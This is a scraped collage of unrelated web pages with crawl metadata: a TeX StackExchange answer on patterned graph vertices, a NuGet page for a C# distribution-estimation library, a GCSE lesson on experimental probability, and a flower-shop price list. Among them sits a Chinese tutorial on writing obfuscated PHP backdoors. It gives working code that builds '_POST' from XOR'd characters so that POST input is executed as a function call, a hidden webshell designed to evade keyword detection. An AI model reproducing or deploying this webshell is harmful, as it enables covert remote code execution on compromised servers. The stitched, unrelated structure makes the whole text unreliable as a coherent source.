] | {"ft_lang_label":"__label__en","ft_lang_prob":0.851437,"math_prob":0.9223765,"size":1320,"snap":"2021-31-2021-39","text_gpt3_token_len":301,"char_repetition_ratio":0.12613982,"word_repetition_ratio":0.015,"special_character_ratio":0.2030303,"punctuation_ratio":0.12448133,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9762799,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,4,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-18T14:13:25Z\",\"WARC-Record-ID\":\"<urn:uuid:8b09e080-466f-4499-942a-9e46809bbac3>\",\"Content-Length\":\"36608\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:66fbe66b-5c44-4f60-8064-d8ddd64e6862>\",\"WARC-Concurrent-To\":\"<urn:uuid:9084039e-2528-460c-9beb-6fb52cf515e6>\",\"WARC-IP-Address\":\"179.43.157.53\",\"WARC-Target-URI\":\"https://flylib.com/books/en/2.300.1/graphs.html\",\"WARC-Payload-Digest\":\"sha1:TUVWVKBCBHYBWSHVHFZXT535TIQXQRKC\",\"WARC-Block-Digest\":\"sha1:HUQZTGZCOZE4FQ7EH4JDK54Z6LS4QKCN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780056476.66_warc_CC-MAIN-20210918123546-20210918153546-00664.warc.gz\"}"} |
https://tex.stackexchange.com/questions/155437/how-can-i-fill-a-vertex-with-black-bars | [
"# How can I fill a vertex with black bars?\n\nSuppose I have simple graph drawing like the following.\n\n\\documentclass[12pt,a4paper]{article}\n\\usepackage{tkz-graph}\n\n\\begin{document}\n\n\\begin{figure}\n\\begin{tikzpicture}\n\n\\SetUpEdge[lw = 1.5pt, color = black, labelcolor = white]\n\\GraphInit[vstyle=Classic]\n\n\\tikzset{VertexStyle/.append style = {minimum size = 8pt, inner sep = 0pt}}\n\n\\Vertices[unit=2]{circle}{a,b,c,d,e,f}\n\n% It's easy to change the color of a vertex!\n\\AddVertexColor{white}{a,d}\n\\Edges(a,b,c,d,e,f,a)\n\n\\end{tikzpicture}\n\\end{figure}\n\n\\end{document}\n\n\nFrom the documentation, I could figure out how to change the color of a vertex, as is done in the code. However, I'd like to use only black and white to represent several colors. For example, could I have a vertex that is filled with black bars? If so, how? This could represent \"blue\", while vertex filled with black is \"green\", and a vertex filled with white is \"red\".\n\n• Welcome to TeX.SX! You can have a look at our starter guide to familiarize yourself further with our format. – Speravir Jan 22 '14 at 17:51\n\n## 1 Answer\n\nLoad the patterns library, and add pattern=<style> to the definition of VertexStyle, where <style> include, for example, horizontal lines, vertical lines, north east lines, north west lines, etc.\n\n# Code\n\n\\documentclass[12pt,a4paper]{article}\n\\usepackage{tkz-graph}\n\\usetikzlibrary{patterns}\n\n\\begin{document}\n\n\\begin{figure}\n\\begin{tikzpicture}\n\n\\SetUpEdge[lw = 1.5pt, color = black, labelcolor = white]\n\\GraphInit[vstyle=Classic]\n\n\\tikzset{VertexStyle/.append style = {minimum size = 8pt, inner sep = 0pt, pattern=north east lines}}\n\n\\Vertices[unit=2]{circle}{a,b,c,d,e,f}\n\n% It's easy to change the color of a vertex!\n\\AddVertexColor{white}{a,d}\n\\Edges(a,b,c,d,e,f,a)\n\n\\end{tikzpicture}\n\\end{figure}\n\n\\end{document}\n\n\n# Output",
null,
""
] | [
null,
"https://i.stack.imgur.com/hHRac.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8481343,"math_prob":0.807045,"size":880,"snap":"2019-13-2019-22","text_gpt3_token_len":254,"char_repetition_ratio":0.11757991,"word_repetition_ratio":0.03448276,"special_character_ratio":0.26136363,"punctuation_ratio":0.17679559,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99395543,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-26T03:13:08Z\",\"WARC-Record-ID\":\"<urn:uuid:4fd59dc2-a285-4ace-8ec3-b86ace758902>\",\"Content-Length\":\"125474\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b1759ba4-cf45-49da-8a3a-4f7c1cd15c84>\",\"WARC-Concurrent-To\":\"<urn:uuid:f822180e-62ff-4180-a85b-e54034bef36f>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://tex.stackexchange.com/questions/155437/how-can-i-fill-a-vertex-with-black-bars\",\"WARC-Payload-Digest\":\"sha1:GB2FA73TONQGAC3XXHBTXQLGIQTM3BCR\",\"WARC-Block-Digest\":\"sha1:33ITG7DMT2HZ2YQ7JLXPCN3MQH7BSI35\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232258621.77_warc_CC-MAIN-20190526025014-20190526051014-00118.warc.gz\"}"} |
http://www.361way.com/abnormal-php-backdoor/3346.html | [
"## 编写变态的PHP后门\n\n2014年5月10日 发表评论 阅读评论\n\n(1)了解PHP\n\n(2)了解curl或者其他一些能够操作HTTP请求的工具\n\n```<?php\necho \"A\" ^ \"}\";\n?>```\n\n```<?php\n\\$_++;\n\\$__=\"<\"^\"}\";\n\\$__(\"stuff\");\n?>```\n\n(1)\\$_++;这行代码的意思是对变量名为\"_\"的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,我们可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。\n\n(2)\\$__=\"<\"^\"}\";对字符\"<\"和\"}\"进行异或运算,得到结果A赋给变量名为\"__\"(两个下划线)的变量\n\n(3)\\$__(\"stuff\");通过上面的赋值操作,变量\\$__的值为A,所以这行可以看作是A(\"stuff\"),在PHP中,这行代码表示调用函数\nA,但是由于程序中并未定义函数A,所以这行代码会抛出一个致命错误使程序停止运行。这行代码没什么实际的意义,但是它能简单体现出在PHP中,我们可以\n\n```<?php\n@\\$_++; // \\$_ = 1\n\\$__=(\"#\"^\"|\"); // \\$__ = _\n\\$__.=(\".\"^\"~\"); // _P\n\\$__.=(\"/\"^\"`\"); // _PO\n\\$__.=(\"|\"^\"/\"); // _POS\n\\$__.=(\"{\"^\"/\"); // _POST\n\\${\\$__}[!\\$_](\\${\\$__}[\\$_]); // \\$_POST(\\$_POST);\n?>```\n\n`\\$__=(\"#\"^\"|\").(\".\"^\"~\").(\"/\"^\"`\").(\"|\"^\"/\").(\"{\"^\"/\");`\n\nYou can donate through PayPal.\nMy paypal id: [email protected]\nPaypal page: https://www.paypal.me/361way\n\n1. 本文目前尚无任何评论."
] | [
null
] | {"ft_lang_label":"__label__zh","ft_lang_prob":0.9329734,"math_prob":0.9951189,"size":1678,"snap":"2019-51-2020-05","text_gpt3_token_len":1223,"char_repetition_ratio":0.08064516,"word_repetition_ratio":0.0,"special_character_ratio":0.31048867,"punctuation_ratio":0.24056605,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96908593,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-09T05:14:41Z\",\"WARC-Record-ID\":\"<urn:uuid:7111e8ea-5d32-490a-9be3-45e4fa411863>\",\"Content-Length\":\"40483\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9dea2397-6791-47ae-a1d7-be70da1689d5>\",\"WARC-Concurrent-To\":\"<urn:uuid:54a11e6a-2e7f-409b-8532-57bea3bfa353>\",\"WARC-IP-Address\":\"47.99.240.20\",\"WARC-Target-URI\":\"http://www.361way.com/abnormal-php-backdoor/3346.html\",\"WARC-Payload-Digest\":\"sha1:M73XZA3LWYA56TQFJIEAG4UMU36HFPGN\",\"WARC-Block-Digest\":\"sha1:OE2DPKB645Z73SOSSQ4AURFDMTUEKYPH\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540517557.43_warc_CC-MAIN-20191209041847-20191209065847-00084.warc.gz\"}"} |
https://www.nuget.org/packages/cs-estimation-of-distribution-algorithms/ | [
"",
null,
"cs-estimation-of-distribution-algorithms 1.0.1\n\nInstall-Package cs-estimation-of-distribution-algorithms -Version 1.0.1\ndotnet add package cs-estimation-of-distribution-algorithms --version 1.0.1\n<PackageReference Include=\"cs-estimation-of-distribution-algorithms\" Version=\"1.0.1\" />\nFor projects that support PackageReference, copy this XML node into the project file to reference the package.\n#r \"nuget: cs-estimation-of-distribution-algorithms, 1.0.1\"\n#r directive can be used in F# Interactive, C# scripting and .NET Interactive. Copy this into the interactive tool or source code of the script to reference the package.\n// Install cs-estimation-of-distribution-algorithms as a Cake Addin\n\n// Install cs-estimation-of-distribution-algorithms as a Cake Tool\n#tool nuget:?package=cs-estimation-of-distribution-algorithms&version=1.0.1\n\ncs-estimation-of-distribution-algorithms\n\nEstimation of Distribution Algorithms implemented in C#\n\nFeatures\n\nThe current library support optimization problems in which solutions are either binary-coded or continuous vectors. The algorithms implemented for estimation-of-distribution are listed below:\n\n• PBIL\n• CGA (Compact Genetic Algorithm)\n• BOA (Bayesian Optimization Algorithm)\n• UMDA (Univariate Marginal Distribution Algorithm)\n• Cross Entropy Method\n• MIMIC\n\nUsage\n\nSolving Continuous Optimization\n\nRunning PBIL\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using PBIL:\n\nint popSize = 8000;\nPBIL s = new PBIL(popSize, f);\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 200;\ns.Minimize(f, max_iterations);\n\nWhere the CostFunction_RosenbrockSaddle is the cost function that is defined as below:\n\n{\n: base(2, -2.048, 2.048) // 2 is the dimension of the continuous solution, -2.048 and 2.048 is the lower and upper bounds for the two dimensions\n{\n\n}\n\n{\ndouble x0 = solution;\ndouble x1 = solution;\ngrad = 400 * (x0 * x0 - x1) * x0 - 2 * (1 - x0);\ngrad = -200 * (x0 * x0 - x1);\n}\n\n// Optional: if not overriden, the default gradient esimator will be provided for gradient computation\nprotected override double _Evaluate(double[] solution) // compute the cost of problem given the solution\n{\ndouble x0 = solution;\ndouble x1 = solution;\n\ndouble cost =100 * Math.Pow(x0 * x0 - x1, 2) + Math.Pow(1 - x0, 2);\nreturn cost;\n}\n\n}\n\nRunning CGA\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using CGA:\n\nint n = 1000; // sample size for the distribution\nCGA s = new CGA(n, f);\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 2000000;\ns.Minimize(f, max_iterations);\n\nRunning UMDA\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using UMDA:\n\nint popSize = 1000;\nint selectionSize = 100;\nUMDA s = new UMDA(popSize, selectionSize, f);\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 2000000;\ns.Minimize(f, max_iterations);\n\nRunning MIMIC\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using MIMIC:\n\nint n = 1000; // population size\nMIMIC s = new MIMIC(n, f);\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 2000000;\ns.Minimize(f, max_iterations);\n\nRunning CrossEntropyMethod\n\nThe sample codes below shows how to solve the \"Rosenbrock Saddle\" continuous optmization problem using CrossEntropyMethod:\n\nint sampleSize = 1000;\nint selectionSize = 100;\nCrossEntropyMethod s = new CrossEntropyMethod(sampleSize, selectionSize, f);\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\nint max_iterations = 2000000;\ns.Minimize(f, max_iterations);\n\nSolving Problems with Binary-encoded Solutions\n\nRunning PBIL\n\nThe samle codes below show how to solve a canonical optimization problem that look for solutions with minimum number of 1 bits in the solution:\n\nint popSize = 8000;\nint dimension = 50;\nint eliteCount = 50;\nPBIL s = new PBIL(popSize, dimension, eliteCount);\ns.MaxIterations = 100;\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\ns.Minimize((solution, constraints) =>\n{\n// solution is binary-encoded\ndouble cost = 0;\n// minimize the number of 1 bits in the solution\nfor(int i=0; i < solution.Length; ++i)\n{\ncost += solution[i];\n}\nreturn cost;\n});\n\nRunning CGA\n\nThe samle codes below show how to solve a canonical optimization problem that look for solutions with minimum number of 1 bits in the solution:\n\nint sampleSize = 8000;\nint dimension = 50;\nint sampleSelectionSize = 100;\nCGA s = new CGA(sampleSize, dimension, sampleSelectionSize);\ns.MaxIterations = 100;\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\ns.Minimize((solution, constraints) =>\n{\n// solution is binary-encoded\ndouble cost = 0;\n// minimize the number of 1 bits in the solution\nfor(int i=0; i < solution.Length; ++i)\n{\ncost += solution[i];\n}\nreturn cost;\n});\n\nRunning UMDA\n\nThe samle codes below show how to solve a canonical optimization problem that look for solutions with minimum number of 1 bits in the solution:\n\nint sampleSize = 8000;\nint dimension = 50;\nint sampleSelectionSize = 100;\nUMDA s = new UMDA(sampleSize, dimension, sampleSelectionSize);\ns.MaxIterations = 100;\n\ns.SolutionUpdated += (best_solution, step) =>\n{\nConsole.WriteLine(\"Step {0}: Fitness = {1}\", step, best_solution.Cost);\n};\n\ns.Minimize((solution, constraints) =>\n{\n// solution is binary-encoded\ndouble cost = 0;\n// minimize the number of 1 bits in the solution\nfor(int i=0; i < solution.Length; ++i)\n{\ncost += solution[i];\n}\nreturn cost;\n});\n\nTODO\n\n• BOA algorithm still has bugs, will need to be fixed in the future release.\n\nThis package has no dependencies.\n\nNuGet packages\n\nThis package is not used by any NuGet packages.\n\nGitHub repositories\n\nThis package is not used by any popular GitHub repositories."
] | [
null,
"https://api.nuget.org/v3-flatcontainer/cs-estimation-of-distribution-algorithms/1.0.1/icon",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.6279394,"math_prob":0.9880993,"size":6806,"snap":"2022-05-2022-21","text_gpt3_token_len":1829,"char_repetition_ratio":0.1461335,"word_repetition_ratio":0.49610677,"special_character_ratio":0.27475756,"punctuation_ratio":0.20259741,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99814856,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-28T00:07:55Z\",\"WARC-Record-ID\":\"<urn:uuid:8974c6bc-2842-445b-aad3-a9cbb2324acb>\",\"Content-Length\":\"49809\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9f6d63ed-a781-4568-8f27-0ec514b5723f>\",\"WARC-Concurrent-To\":\"<urn:uuid:b6552205-12d7-4de2-abf6-e667714ff00c>\",\"WARC-IP-Address\":\"52.240.159.111\",\"WARC-Target-URI\":\"https://www.nuget.org/packages/cs-estimation-of-distribution-algorithms/\",\"WARC-Payload-Digest\":\"sha1:I47JII2LKOU6CFZ3K7SAHEB4HSI3O33V\",\"WARC-Block-Digest\":\"sha1:NCF6JUW32WKUSJ23RFPA4SBIPNK37L2Q\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320305317.17_warc_CC-MAIN-20220127223432-20220128013432-00690.warc.gz\"}"} |
https://www.bloomsvilla.com/collections/pink-color-flowers?view=amp | [
"Rs. 599.00\nRs. 2,049.00\nRs. 799.00\nRs. 449.00\nRs. 1,299.00\nRs. 3,599.00\nRs. 1,099.00\nRs. 1,349.00\nRs. 549.00\nRs. 499.00\nRs. 799.00\nRs. 1,249.00\nRs. 799.00\nRs. 549.00\nRs. 2,199.00\nRs. 1,699.00\nRs. 1,599.00\nRs. 799.00\nRs. 1,849.00\nRs. 699.00\nRs. 699.00\nRs. 599.00\nRs. 1,499.00\nRs. 799.00\nRs. 2,499.00\nRs. 1,299.00\nRs. 599.00\nRs. 699.00\nRs. 1,899.00\nRs. 1,999.00\nRs. 1,199.00\nRs. 1,199.00\nRs. 1,199.00\nRs. 1,899.00\nRs. 2,899.00\nRs. 1,399.00\nRs. 1,699.00\nRs. 1,849.00\nRs. 1,349.00\nRs. 2,199.00\nRs. 3,199.00\nRs. 2,049.00\nRs. 749.00\nRs. 749.00\nRs. 1,649.00\nRs. 1,499.00\nRs. 749.00\nRs. 1,899.00"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.55550414,"math_prob":0.9991848,"size":3202,"snap":"2022-27-2022-33","text_gpt3_token_len":1164,"char_repetition_ratio":0.20419012,"word_repetition_ratio":0.007782101,"special_character_ratio":0.32948157,"punctuation_ratio":0.2032967,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99136513,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-30T20:21:45Z\",\"WARC-Record-ID\":\"<urn:uuid:05b56387-e280-44f9-adc4-8ef8b7df4505>\",\"Content-Length\":\"224916\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:97df99f8-f64d-4aac-96de-26f847244e7c>\",\"WARC-Concurrent-To\":\"<urn:uuid:64b3ebc1-00d7-4b6f-90c2-4e43e513e93b>\",\"WARC-IP-Address\":\"23.227.38.74\",\"WARC-Target-URI\":\"https://www.bloomsvilla.com/collections/pink-color-flowers?view=amp\",\"WARC-Payload-Digest\":\"sha1:YYP63WGRAJD22XRJFW2CCMQF7U4PUICM\",\"WARC-Block-Digest\":\"sha1:JB5RC327CZDUZNUMQBWZ7DL2PIRT7TAI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103877410.46_warc_CC-MAIN-20220630183616-20220630213616-00213.warc.gz\"}"} |
https://thirdspacelearning.com/gcse-maths/probability/experimental-probability/ | [
"# Experimental Probability\n\nHere we will learn about experimental probability, including using the relative frequency and finding the probability distribution.\n\nThere are also probability distribution worksheets based on Edexcel, AQA and OCR exam questions, along with further guidance on where to go next if you’re still stuck.\n\n## What is experimental probability?\n\nExperimental probability is the probability of an event happening based on an experiment or observation.\n\nTo calculate the experimental probability of an event, we calculate the relative frequency of the event.\n\n\\text{Relative frequency = }\\frac{\\text{frequency of event occurring}}{\\text{total number of trials of the experiment}}\n\nWe can also express this as R=\\frac{f}{n} where R is the relative frequency, f is the frequency of the event occurring, and n is the number of trials of the experiment.\n\nIf we find the relative frequency for all possible events from the experiment we can write the probability distribution for that experiment.\n\nThe relative frequency, experimental probability and empirical probability are the same thing and are calculated using the data from random experiments. They also have a key use in real-life problem solving.\n\nFor example, Jo made a four-sided spinner out of cardboard and a pencil.\n\nShe spun the spinner 50 times. The table shows the number of times the spinner landed on each of the numbers 1 to 4. The final column shows the relative frequency.\n\nThe relative frequencies of all possible events will add up to 1.\n\n0.12 + 0.26 + 0.3 + 0.32 = 1\n\nThis is because the events are mutually exclusive.\n\nStep-by-step guide: Mutually exclusive events\n\n### What is experimental probability?",
null,
"### Experimental probability vs theoretical probability\n\nYou can see that the relative frequencies are not equal to the theoretical probabilities we would expect if the spinner was fair.\n\nIf the spinner is fair, the more times an experiment is done the closer the relative frequencies should be to the theoretical probabilities.\n\nIn this case the theoretical probability of each section of the spinner would be 0.25, or \\frac{1}{4}.\n\nStep-by-step guide: Theoretical probability\n\n## How to find an experimental probability distribution\n\nIn order to calculate an experimental probability distribution:\n\n1. Draw a table showing the frequency of each outcome in the experiment.\n2. Determine the total number of trials.\n3. Write the experimental probability (relative frequency) of the required outcome(s).\n\n### Explain how to find an experimental probability distribution",
null,
"### Related lessons onprobability distribution\n\nExperimental probability is part of our series of lessons to support revision on probability distribution. You may find it helpful to start with the main probability distribution lesson for a summary of what to expect, or use the step by step guides below for further detail on individual topics. Other lessons in this series include:\n\n## Experimental probability examples\n\n### Example 1: finding an experimental probability distribution\n\nA 3 sided spinner numbered 1,2, and 3 is spun and the results recorded.\n\nFind the probability distribution for the 3 sided spinner from these experimental results.\n\n1. Draw a table showing the frequency of each outcome in the experiment.\n\nA table of results has already been provided. We can add an extra column for the relative frequencies.\n\n2Determine the total number of trials\n\n37 + 49 + 24 = 110\n\n3Write the experimental probability (relative frequency) of the required outcome(s).\n\nDivide each frequency by 110 to find the relative frequencies.\n\n### Example 2: finding an experimental probability distribution\n\nA normal 6 sided die is rolled 50 times. A tally chart was used to record the results.\n\nDetermine the probability distribution for the 6 sided die. Give your answers as decimals.\n\nUse the tally chart to find the frequencies and add a row for the relative frequencies.\n\nThe question stated that the experiment had 50 trials. We can also check that the frequencies add to 50.\n\nDivide each frequency by 50 to find the relative frequencies.\n\n### Example 3: using an experimental probability distribution\n\nA student made a biased die and wanted to find its probability distribution for use in a game. They rolled the die 100 times and recorded the results.\n\nBy calculating the probability distribution for the die, determine the probability of the die landing on a 3 or a 4.\n\nA table of results has already been provided. We can add an extra column for the relative frequencies.\n\nThe die was rolled 100 times.\n\nWe can find the probability of rolling a 3 or a 4 by adding the relative frequencies for those numbers.\n\nP(3 or 4) = 0.22 + 0.25 = 0.47\n\n### Example 4: calculating the relative frequency without a known frequency of outcomes\n\nA research study asked 1200 people how they commute to work. 640 travelled by car, 174 used the bus, and the rest walked. Determine the relative frequency of someone not commuting to work by car.\n\nWriting the known information into a table, we have\n\nWe currently do not know the frequency of people who walked to work. We can calculate this as we know the total frequency.\n\nThe number of people who walked to work is equal to\n\n1200-(640+174)=386.\n\nWe now have the full table,\n\nThe total frequency is 1200.\n\nDivide each frequency by the total number of people (1200), we have\n\nThe relative frequency of someone walking to work is 0.321\\dot{6} .\n\n## How to find a frequency using an experimental probability\n\nIn order to calculate a frequency using an experimental probability:\n\n1. Multiply the total frequency by the experimental probability.\n\n### Explain how to find a frequency using an experimental probability",
null,
"### Example 5: calculating a frequency\n\nA dice was rolled 300 times. The experimental probability of rolling an even number is \\frac{27}{50}. How many times was an even number rolled?\n\n300\\times\\frac{27}{50}=6\\times{27}=162\n\nAn even number was rolled 162 times.\n\n### Example 6: calculating a frequency\n\nA bag contains different coloured counters. A counter is selected at random and replaced back into the bag 240 times. The probability distribution of the experiment is given below.\n\nDetermine the number of times a blue counter was selected.\n\nAs the events are mutually exclusive, the sum of the probabilities must be equal to 1. This means that we can determine the value of x.\n\n1-(0.4+0.25+0.15)=0.2\n\nThe experimental probability (relative frequency) of a blue counter is 0.2.\n\nMultiplying the total frequency by 0.1, we have\n\n240 \\times 0.2=48.\n\nA blue counter was selected 48 times.\n\n### Common misconceptions\n\n• Forgetting the differences between theoretical and experimental probability\n\nIt is common to forget to use the relative frequencies from experiments for probability questions and use the theoretical probabilities instead.\n\nFor example, they may be asked to find the probability of a die landing on an even number based on an experiment and the student will incorrectly answer it as 0.5.\n\n• The relative frequency is not an integer\n\nThe relative frequency is the same as the experimental probability. This value is written as a fraction, decimal or percentage, not an integer.\n\n### Practice experimental probability questions\n\n1. A coin is flipped 80 times and the results recorded.",
null,
"Determine the probability distribution of the coin.",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"As the number of tosses is 80, dividing the frequencies for the number of heads and the number of tails by 80, we have\n\n34\\div{80}=0.425\n\n46\\div{80}=0.575\n\n2. A 6 sided die is rolled 160 times and the results recorded.",
null,
"Determine the probability distribution of the die. Write your answers as fractions in their simplest form.",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"Dividing the frequencies of each number by 160, we get",
null,
"3. A 3 -sided spinner is spun and the results recorded.",
null,
"Find the probability distribution of the spinner, giving you answers as decimals to 2 decimal places.",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"Dividing the frequencies of each colour by 128 and simplifying, we have",
null,
"4. A 3 -sided spinner is spun and the results recorded.",
null,
"Find the probability of the spinner not landing on red. Give your answer as a fraction.\n\n\\frac{19}{64}",
null,
"\\frac{2}{3}",
null,
"\\frac{45}{64}",
null,
"\\frac{9}{10}",
null,
"Add the frequencies of blue and green and divide by 128.\n\n5. A card is picked at random from a deck and then replaced. This was repeated 4000 times. The probability distribution of the experiment is given below.",
null,
"How many times was a club picked?\n\n701",
null,
"1056",
null,
"33",
null,
"4000",
null,
"4000\\times\\frac{33}{125}=1056",
null,
"6. Find the missing frequency from the probability distribution.",
null,
"45",
null,
"80",
null,
"34",
null,
"36",
null,
"The total frequency is calculated by dividing the frequency by the relative frequency.\n\n16\\div{0.2}=80\n\n80-(16+28)=36\n\n### Experimental probability GCSE questions\n\n1. A 4 sided spinner was spun in an experiment and the results recorded.",
null,
"(b) Find the probability of the spinner landing on a square number.\n\n(5 marks)\n\n(a)\n\nTotal frequency of 80.\n\n(1)\n\n2 relative frequencies correct.\n\n(1)\n\nAll 4 relative frequencies correct 0.225, \\ 0.2, \\ 0.3375, \\ 0.2375.\n\n(1)\n\n(b)\n\nRelative frequencies of 1 and 4 used.\n\n(1)\n\n0.4625 or equivalent\n\n(1)\n\n2. A 3 sided spinner was spun and the results recorded.\n\nComplete the table.",
null,
"(4 marks)\n\n1-0.3-0.25 = 0.45\n\n(1)\n\nProcess to find total frequency or use of ratio with 36 and 0.3.\n\n(1)\n\n30\n\n(1)\n\n54\n\n(1)",
null,
"3. Ben flipped a coin 20 times and recorded the results.",
null,
"(a) Ben says, “the coin must be biased because I got a lot more heads than tails”.\n\nComment on Ben’s statement.\n\n(b) Fred takes the same coin and flips it another 80 times and records the results.",
null,
"Use the information to find a probability distribution for the coin.",
null,
"(6 marks)\n\n(a)\n\nStating that Ben’s statement may be false.\n\n(1)\n\nMentioning that 20 times is not enough trials.\n\n(1)\n\n(b)\n\nEvidence of use of both sets of results from Ben and Fred.\n\n(1)\n\nProcess of dividing by 100.\n\n(1)\n\n(1)\n\nP(tails) = 0.52 or equivalent\n\n(1)\n\n## Learning checklist\n\nYou have now learned how to:\n\n• Use a probability model to predict the outcomes of future experiments; understand that empirical unbiased samples tend towards theoretical probability distributions, with increasing sample size\n\n## Still stuck?\n\nPrepare your KS4 students for maths GCSEs success with Third Space Learning. Weekly online one to one GCSE maths revision lessons delivered by expert maths tutors.\n\nFind out more about our GCSE maths tuition programme."
] | [
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-what-is-card.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-Probability-how-to-card-1.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-Probability-how-to-card-2.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-1-300x76.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-2-300x112.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-3-300x112.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-6-300x112.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-1-image-5-300x112.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-image-1-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-image-2-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-image-3-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-correct-answer-1-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-correct-answer-2-300x246.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-2-explanation-image-300x175.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-300x142.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-correct-answer-1-300x141.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
